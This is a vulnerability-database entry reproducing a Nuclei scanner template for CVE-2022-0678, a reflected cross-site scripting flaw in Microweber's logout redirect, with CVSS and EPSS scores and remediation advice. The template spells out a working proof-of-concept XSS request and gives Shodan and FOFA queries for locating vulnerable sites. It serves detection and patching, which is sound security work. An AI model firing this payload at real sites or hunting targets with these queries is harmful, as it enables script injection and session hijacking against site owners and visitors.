Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-0678
HistorySep 14, 2022 - 5:19 p.m.

Microweber <1.2.11 - Cross-Site Scripting

2022-09-1417:19:21
ProjectDiscovery
github.com
8
cve
cve2022
huntr
xss
microweber
packagist
vulnerability

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

50.8%

Packagist prior to 1.2.11 contains a cross-site scripting vulnerability via microweber/microweber. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.
id: CVE-2022-0678

info:
  name: Microweber <1.2.11 - Cross-Site Scripting
  author: tess,co5mos
  severity: medium
  description: |
    Packagist prior to 1.2.11 contains a cross-site scripting vulnerability via microweber/microweber. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Upgrade Microweber CMS to version 1.2.11 or later, which includes a fix for this vulnerability.
  reference:
    - https://huntr.dev/bounties/d707137a-aace-44c5-b15c-1807035716c0/
    - https://twitter.com/CVEnew/status/1495001503249178624?s=20&t=sfABvm7oG39Fd6rG44vQWg
    - https://huntr.dev/bounties/d707137a-aace-44c5-b15c-1807035716c0
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0678
    - https://github.com/microweber/microweber/commit/2b8fa5aac31e51e2aca83c7ef5d1281ba2e755f8
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-0678
    cwe-id: CWE-79
    epss-score: 0.00138
    epss-percentile: 0.49247
    cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: microweber
    product: microweber
    shodan-query:
      - http.favicon.hash:780351152
      - http.html:"microweber"
    fofa-query:
      - body="microweber"
      - icon_hash=780351152
  tags: cve,cve2022,huntr,xss,microweber

http:
  - method: GET
    path:
      - '{{BaseURL}}/demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '><script>alert(document.domain)</script>'
          - 'content="Microweber"'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 404
# digest: 4a0a00473045022100a2bae8053995b1fb173f11cafeb899542b9b1ed842c7244b6a4f4157d8d8a770022059a14a36a6b94a8dfd9201e91c576b8dbde82df3733f907bd00b87c14be86d32:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

50.8%

Related for NUCLEI:CVE-2022-0678